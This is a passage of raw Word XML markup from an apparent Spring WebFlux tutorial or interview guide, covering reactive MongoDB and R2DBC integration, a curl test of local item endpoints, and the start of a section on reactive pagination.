          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D0B057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1ADE5D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5FAC867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78AE723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61A28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7A494AB"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un the Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE8417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 using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C24F1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606341E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using Gradle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE35A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5F2468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w you can interact with the database using the exposed reactive endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D8425A"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Test the Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D763C8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ing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 you can test the reactive API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFCEBF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 all items</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F57CA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 a specific item by ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BB302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 /api/items</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Create a new item (send JSON with name and price)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C328E0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curl to fetch all items:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7F63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441098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BBAFE7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C0459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price":100.0},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3A74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price":200.0}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538486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1E185A2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Advantages of Reactive Database Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274736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Database queries are non-blocking, which means the thread doesn't wait for the database operation to complete and can serve other requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F261A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r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The reactive stream can handle backpressure by slowing down data processing when the consumer is unable to keep up with the producer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A99FD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Reactive programming allows handling more requests concurrently, improving scalability by utilizing fewer threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009DB35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3CF60D3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324" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="050C872D" w14:textId="7043B84E"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8" w:name="_Toc197867752"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the steps to connect a reactive database (like MongoDB or R2DBC) to Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="538"/>
    </w:p>
    <w:p w14:paraId="08831953" w14:textId="6A89060A"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connect a reactive database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to a Spring WebFlux application, you need to follow a few key steps. Below are the steps to integrate both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with Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286F2DEA"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MongoDB (Reactive) to Spring WebFlux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C413CA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7DC0B9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include the required dependencies in your pom.xml (for Maven) or build.gradle (for Gradle).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A951B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MongoDB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB203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73B1E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62067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C9439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D7AB3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77569E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10060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MongoDB (Reactive) --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167566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0E073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DCC1A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0A19AF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166400D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580F77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MongoDB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA390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10E14A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2DF30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reactive'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60635A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8108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MongoDB Connection (application.yml):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171F72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configure the connection settings for MongoDB in your application.yml or application.properties file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C72E267"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E645E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7B9CD40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A7EA1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godb:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7716E05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mongodb://localhost:27017/mydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A8F18C"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43476B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mongodb.uri=mongodb://localhost:27017/mydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F750A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1BDD02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or entity) that corresponds to a MongoDB collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C856D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08B923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41955B5F" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19DF17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1E8697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C7FBB50" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B41BF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64692B1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31A5F91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75230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722AC66" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="483CA4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597D3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4F1FB9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Repository:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424D6D1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pository interface that extends ReactiveMongoRepository for MongoDB interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5E6BF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54609216" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17D1280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4DF9DD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05B3577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C2FFDA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682390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layer will interact with the repository to fetch data in a non-blocking manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37607A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B58B3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4FD94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F4536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D45163D" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E72EFB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4A62F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10C92F4" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A6E861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D1AE5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7BF504C0" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01C439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FE497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5FA469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17A3D73" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="099435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15E5941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236E61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CA38D2A" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="096B68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78A3A4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38DC73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51B7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5F4351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Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A67A9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controller that exposes REST endpoints for interacting with the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B8EF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EBAB8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2C4E8F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CF4E3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9C85BE6" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="567A5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2F131C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B48806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7725830" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78AE1DC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BA1E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13AD7DC" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2977F58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A1317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4974CE3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itemService.getItemById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2116DB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E73CD1" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3614C1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54B09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3AC27D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5247BF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57FABD3" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DEF87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9298A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29A9965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F8457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48DCE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F2D8B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1157D26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run your Spring Boot application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71302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E9DA5E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MongoDB reactively!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F21D3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381B6C">
          <v:rect id="_x0000_i2325" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43582E8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R2DBC (Reactive Relational Database) to Spring WebFlux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FD15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102B0B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clude the necessary dependencies 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e.g., PostgreSQL, H2) in your pom.xml or build.gradle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E51DF2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R2DBC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E9F6E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BB247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016DC0D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A8B8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50F8C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081FDA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5EDD9CC" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C93B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PostgreSQL Driver --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630CE4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00AB3B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44295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018BBC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8C612B3" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11C851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4CF891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6E83C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4653D0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86737E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D7762C" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46DD62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Optional for Development) --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36098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610EDD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728214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034DA50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4BF94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B449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37128D9"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R2DBC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4738C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69754E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451980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59425DB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621159F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4EB647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DF1E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R2DBC Connection (application.yml):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AF6D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efine the connection properties for your R2DBC-enabled database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1008E5A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05FE25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397AB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2F713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4BA948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84591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FE1069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56C74C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6CB4B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302635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44E8221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1871DB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62F5E8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0EE03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4A15DE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441868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77729E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to represent the data in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033220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350C99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3F6805A8" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14ADDAF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6CB532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E5AA37A" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="763E836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574482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7A56FD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641FD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CA7CE87" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CAAEA9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33F632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6F42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pository for Reactive Database Access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601921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to handle the database operations reactively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1BA1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218549C" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A7297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39327C4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D595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7CD00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class interacts with the repository in a non-blocking manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5314C3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9D26D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4DE722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732BE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0D171BD" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E053BB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59D1F14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66229B17" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58A4C12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93FD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F6807B3" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74FC2A6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8F2A8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03ADC0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171E2E" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AEDA2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59784AC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76D96FD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0EA53446" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72D323E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2914C0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1C19F9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7E4C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46C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Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624D95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pose REST endpoints using a reactive controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556C60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9C01AD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9D3B2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9686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64A66AD1" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F5CB1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20A23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5A0C20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1E4C79F7" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76EFA9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6335845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7238415" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="488ED8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B05E37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1BF454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07476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8AB49FB" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E42163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085C56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972A1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DA37E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3FECBF" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="436A27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A863A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6A8E1E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478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73D81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DB10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5C10FF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132067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D3AE9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an R2DBC-supported relational database (like PostgreSQL or H2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382F191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0EFF9">
          <v:rect id="_x0000_i2326" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E2C8E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441D9D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327" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7495B19A" w14:textId="53DCA6E0"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9" w:name="_Toc197867753"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How would you implement pagination in a reactive Spring WebFlux application</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="539"/>
    </w:p>
    <w:p w14:paraId="203E80B3" w14:textId="297B71F6"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in a reactive Spring WebFlux application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504222E0"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mplement Pagination in a Reactive Spring WebFlux Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1440BB2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125971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nsure you have the required dependencies for Spring WebFlux and your reactive database (e.g., MongoDB or R2DBC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7692B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exampl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3BE712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BDB62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B01E7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31965E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067D0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9ABEB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36740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B2ECC9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1D6AE8C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7148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9F73C6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD5167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35CB54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7B75D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F63A3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C71F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C1E20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AE401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809D8B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0CCCDC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A3893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7805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327719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1E2C3A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D000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43AD4C6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Domain Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5A1B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the domain model that you want to paginate. For example, a simple Item model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD68F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4B4BE74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39F3ACF0" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="543E44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73D625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7B0A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05B7D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50F1FA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6E1BE6E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F7674CD" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E6BB59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45212E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4EF9EC8"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pository with Pagination Support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AB292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extend ReactiveMongoRepository and use Pageable to support pagination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C55EC5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2757E0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713954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3F6C10B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2FCAF2E9" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
